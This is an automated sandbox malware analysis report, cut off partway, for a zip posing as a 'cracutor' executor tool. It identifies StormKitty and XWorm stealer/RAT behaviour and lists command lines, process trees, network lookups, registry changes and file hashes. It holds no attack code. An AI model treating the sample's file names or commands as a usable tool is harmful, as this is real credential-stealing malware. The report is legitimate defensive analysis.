Malware Analysis Report

2024-09-22 23:48

Sample ID 240519-vwc9aahd9y
Target cracutor-executor-main.zip
SHA256 587e590b78e0a3c36a4ac79ccec05415ca510e9ad20345ab39524e0130a8cb75
Tags
execution stormkitty xworm pyinstaller rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1 (Detonation Overview, Signatures)

Behavioral analyses, each with the subsections Detonation Overview, Command Line, Signatures, Processes, Network, Files:

Analysis: behavioral17
Analysis: behavioral18
Analysis: behavioral3
Analysis: behavioral20
Analysis: behavioral25
Analysis: behavioral4
Analysis: behavioral5
Analysis: behavioral19
Analysis: behavioral24
Analysis: behavioral9
Analysis: behavioral22
Analysis: behavioral23
Analysis: behavioral7
Analysis: behavioral15
Analysis: behavioral21
Analysis: behavioral26
Analysis: behavioral1
Analysis: behavioral8
Analysis: behavioral10
Analysis: behavioral27
Analysis: behavioral2
Analysis: behavioral11
Analysis: behavioral14
Analysis: behavioral16
Analysis: behavioral28
Analysis: behavioral6
Analysis: behavioral12
Analysis: behavioral13

Analysis Overview

score
10/10

SHA256

587e590b78e0a3c36a4ac79ccec05415ca510e9ad20345ab39524e0130a8cb75

Threat Level: Known bad

The file cracutor-executor-main.zip was found to be: Known bad.

Malicious Activity Summary

execution stormkitty xworm pyinstaller rat spyware stealer trojan

StormKitty

Xworm

StormKitty payload

Detect Xworm Payload

Contains code to disable Windows Defender

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Checks computer location settings

Deletes itself

Drops startup file

Executes dropped EXE

Reads user/profile data of web browsers

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Command and Scripting Interpreter: PowerShell

Unsigned PE

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Detects Pyinstaller

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: CmdExeWriteProcessMemorySpam

Modifies registry class

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Enumerates processes with tasklist

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-19 17:20

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240419-en

Max time kernel

118s

Max time network

119s

Command Line

wscript.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Infinity.js"

Signatures

Command and Scripting Interpreter: JavaScript

execution

Processes

C:\Windows\system32\wscript.exe

wscript.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Infinity.js"

Network

N/A

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240426-en

Max time kernel

138s

Max time network

128s

Command Line

wscript.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Infinity.js"

Signatures

Command and Scripting Interpreter: JavaScript

execution

Processes

C:\Windows\system32\wscript.exe

wscript.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Infinity.js"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 37.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240221-en

Max time kernel

135s

Max time network

135s

Command Line

"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.xml"

Signatures

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = [value omitted] C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "422301135" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90dce40211aada01 C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2D8D8B91-1604-11EF-989B-729E5AF85804} = "0" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b00000000020000000000106600000001000020000000052260c01c53213f9e1f8064637f481cb826ac7e6da447c8ccc427f27f4a2f3d000000000e8000000002000020000000c6c8d80d85782a12eb5890500e3fe619a8f641465b5278917622af7d90a4e03c200000000c646705b686852f41c1a2ed54d6aca14339e3938dd61aebedcf999172bdb6924000000060b38a45fa4a4432be0ccf0b9295269927c40ca7dfd2e1b4e992a927ee236ced5e44ec18f30f7f0ea6dcedc43ed1bea7aa7a153f48fb941bcf53089025c286bb C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2872 wrote to memory of 2844 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2872 wrote to memory of 2844 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2872 wrote to memory of 2844 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2872 wrote to memory of 2844 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2844 wrote to memory of 2564 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2844 wrote to memory of 2564 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2844 wrote to memory of 2564 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2844 wrote to memory of 2564 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2564 wrote to memory of 2588 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2564 wrote to memory of 2588 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2564 wrote to memory of 2588 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2564 wrote to memory of 2588 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.xml"

C:\Program Files (x86)\Internet Explorer\iexplore.exe

"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome

C:\Program Files\Internet Explorer\IEXPLORE.EXE

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2564 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabB7BD.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\TarC453.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 aa80b60a431b389549cb26e5e9913373
SHA1 b0855a80f5da6000276e0f612a6179c63962b47f
SHA256 8d46e539fe50a477c58f135a29ba7d299707f1435b1e9154a76a07a302a1bcea
SHA512 649cfe3fde3fb1bfa3889eac4481c65afaf27754f06e521e2db99d667385a39e1905364ac8570f5422d1d86d116e0ec1a4cfaaae3ad97a3599655ffd475ab5ca

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a81738119ce0adef12954dfe99baa075
SHA1 130e1df2fa9c863107004a3c6f2ab997018ee018
SHA256 6c3c1d7b761c8493d4175c9b38395b4237869397ad027c6aa6849532fa6d0449
SHA512 fec3f964b71fcc481a9aad419b91981dc32f50e2f7802cf47af2cfaa1947a515eae0b27d03550f5a62cde1b5a05730dc37ccef1fb276a78ed6e7a336a8710f1a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3b1efb914d64a90b8c1b91c2d67e40b5
SHA1 a0ba7dfe0773ab8beff3b70ab40392c2a073c7ba
SHA256 5be90f278cc26177b98fe5418bbfeff800c135acae8f31807052858ffb856262
SHA512 27c3d4a72a9d1c01bdc0d1f6c29ddce5dfaa7ca7be569b2a4d7d77733c002fefb10df9a0be61cc2cfa0347c18d02def4a634754b629fd4f98dde8fb99c4af161

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fb85b73b4a2f2fe654ba401b77baf990
SHA1 527395dd766110adf5a30feb83735f0c9e633728
SHA256 a65b8356894635ddb7ca7ccb6298c4717f26db6340c6150b473c00768007d71e
SHA512 8df9c0c4b9bed9387ca95448ee4e508abeb3f03916ff9d15a53af45fdaddc6413bc28f3b25f501edcc8856592a1cf0e89c689f6b2b8a50f814c0fdd5fa7a8311

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 22f0f1d0d65d7afd19af79e886c29f7a
SHA1 78163f71b84e0b8d263f0089d6f2e1a05746c1f2
SHA256 e026e9a37b1bacf603c0ada8b5c468a427ed4042a5cd926066f804c9a4808e83
SHA512 5bcda6bce6c2bae3531b03d48de16b4845ec98968a7e2443d7c04936af0fb4feeeac148158d4b22d5b31d814173defc645a32f26b33035dd4e209aa4c508f708

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 47dea7a0e474654a268679ca13126a35
SHA1 23ef6714b518c4c5c21a05ce0d3b59e535246c88
SHA256 94d68176ce718a5d100e86a37b665bb2b3466af0d8b8242a818a0add3427253f
SHA512 a615ff216c604e860bd66c014fcd28d998c82d93fb0553214358466a46cc5b45861047604b9fa3b47d7b849efc257a0857a7d1b10f48d0b3d8d6ac13d043f11e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5b6e267ecf346fd56ce5f917a52efcc3
SHA1 1ae835f983d91e12caa7478a1893016e32977163
SHA256 9a294b6a4a2465a2654920109df99a788b9147e5b2e1dd9efe59dc06ec000913
SHA512 ada7d48f2e9a2425acf72adc69e64c5600b552d3afada4dd0fe2cd94573e89620ee716a5daa5cce8284febce884584b9c8783f00cd4f54e7e2b39b9c23d8221b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7b18bebe97e9610a0d82eba114a5ffcd
SHA1 279d386d19b41bbe9a5c3903ab41cd7b82ae7cd8
SHA256 4318efa06be4463e8c5dd1ab36b2bc576c8141aa573e62bae1b945b0a35d8cbf
SHA512 1c5565413ad3fc5d7b5fd162ef05b6bae34797e2f2fb554d4bc33d46d675dad0bceebc1d8d846c9212e9511c85afdbd480476b606d0ff231b5c869eb241d98e4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3acf8dd835de8abdcb4b441d914f00c2
SHA1 34f9fa11f06e26bdd2411e1b7f01c78f87f9dcaf
SHA256 76e90047dac46c1c9773cf12509d5137f56f68d338e9f0367095212133168776
SHA512 8e7fbfaf5c4a0cf86cd678a775f7dee23b35a29d4626473f737bf2cc3a18d43fff179d49da45964bb6030a363ba3b0ae246c97daaa90e398f6ff2f6345373291

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bf548f216a0782ae63cd4112299514ec
SHA1 4e3d61fd5e54dc9737f3e90742b3b0efb29b95f1
SHA256 430406aff8ada2ef19c6bd1e7d984f87f49ded89493de181c087ce46c8745d35
SHA512 badf0ffad69fbb351ba1bad6d566827d6c2b61a2c6a5ca7d08f1252adee90b47311b48708b2f3eca90bf745ff8ec566f48602c04fe144d96870e61465ebc1dc2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 554e7462ce317fd187ba35441cc79e26
SHA1 5c9852e821471202cf8e6388caa3ee5faf2be738
SHA256 cef08c0e2b2888f11e83eb55c8555e87ec68f83e5926d5ffe71b3933fc03e3d6
SHA512 7ae66b31119c30d49b42cbdfd7260b34758625a533b5fa07366bf417a0f8458aef1dfda02cf5d81cf8a81b7b1f988b4c0b0430207ce6fefefdaac3702b3132b5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d88ab1419be9005e0c983a9e59e7fa43
SHA1 604af517a6381165116a3a53a04a636eb4103fcd
SHA256 a6a6ca0d0033125beb10f1e2a3f792575b0ff09974d93fe1fed63be3b634438f
SHA512 ae72b0dd0b113f8847a16bdcb79567a101e0e90f3c6c8679360ae4611f5ff179d940a5b33bb579ecd3f1140d1a65d42ebbcb967a962125720ec30ef8ac0547b0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6621842d05744e79f247a60810a59d2a
SHA1 999e7291e393b6b8d5f12f243da0f13b797f8413
SHA256 ce1fa41a78d72edafa64cd78c0cef31fc59ae5453cb48563644c66cf3acb35dc
SHA512 087ec76eb668bdb15d26ace26f7a38e63751a4a29af119388f724c98a716d9861de4513d19bf5300f7ce1ebb3c90b5a777f6dc4f608418869a5d6aafb51db05c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 356607389d7ef438719bb7d88942f3ab
SHA1 196bd6b7c53dc6ba5d420fb7e454490bbf718426
SHA256 986ac311ff9ccaece1d620b35863b400e9f9c7eff08448e2c99f2a3de2310d40
SHA512 aa28f4ddb70a87fc13f2dbfc4c7f8fb8a9a62dd5cc17d8d85d5226b2c3f5f638eccb7f48624fb12bdfe11c2246916bc327843dad6a0258e6c9d700a5c762c8b9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 117ee0a8982ecfda5c4c63616e5fcba0
SHA1 10f637bd4834a5d29449baa92615ee73f8ff64e3
SHA256 423d5c18c479a408a5908b5027b6817f55dc4b7f5a10c3b129da1b5945ad2411
SHA512 c92d54a6371e1b24fb804a6abf201efb49fdcebc3ca78873275ecf1f4ad1b0c988e09354b498b3107340bca64595ebe9279d5ba9084fca7f172fa19794376099

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4cc770a87bac4e90e069d9c8d6dc8d6b
SHA1 a03430fb8805c03e50c323be73b19cd020dae492
SHA256 e01af19691bb7affdf71b484831a56b42be503a86091d5cc532d8d3874c4066d
SHA512 6af1ebfc188e8155258d03592475e3451810f1476e7c8628b36d39ec3e06c65e337f9674822923a04c92aaf36fb271d62df3303d621ff230a8c4395c380380e0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c5592c3c3b6ebfc24352e388f138c7e8
SHA1 1a71e444b8eda4012d4219e75d378e344793527a
SHA256 2d0f461f013c84353fce8413221df5cc543123914bb4a2eafbfd65e02b89d8bf
SHA512 c380efe884d102c7836721bc41f92d021a5d2923aee63b2f7ef67f05aa41afdcd615269a77df947f21fdf3a812f23213cf356f5f4e6c338a686e56933bf31e96

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5ca5b3f39221bad1e085f5bf9e0c33fd
SHA1 c79d2df616e2c7d28a46770b06dc3486b82f4915
SHA256 a454abbafe8206958f2ac9ef551f11624a06c90862dd9ac8b30b442cf316fcb3
SHA512 4b074bd4a70a6aa9ce6c6b3cde7bff2e22aaa800d480fe22315a43d9aa99a2516cd99ec7edf4d3032ce747d8d1f6fbd034a5597739b46e4af2f41ecd06a3d36e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4c86e7d1608bbc45768dd3eed83c125a
SHA1 c4b68763d0608b97561e24889b1928e37283fb1a
SHA256 d7cb00a4b8c149a74b1dc17b57ea0263fc032048ae00890d69f15a50c5868841
SHA512 d0a6f7c2c02c49a04f8ae2a3315df7337a01809a09ca168b9c1e562364b4367802884bb9851009c859c0ceb586c666c16b038dc0048b1dc95b83da9304ca2441

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240426-en

Max time kernel

149s

Max time network

151s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Plz Donate Bot.txt"

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Plz Donate Bot.txt"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.89:443 www.bing.com tcp
US 8.8.8.8:53 89.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
NL 23.62.61.89:443 www.bing.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 50.192.11.51.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240221-en

Max time kernel

118s

Max time network

123s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
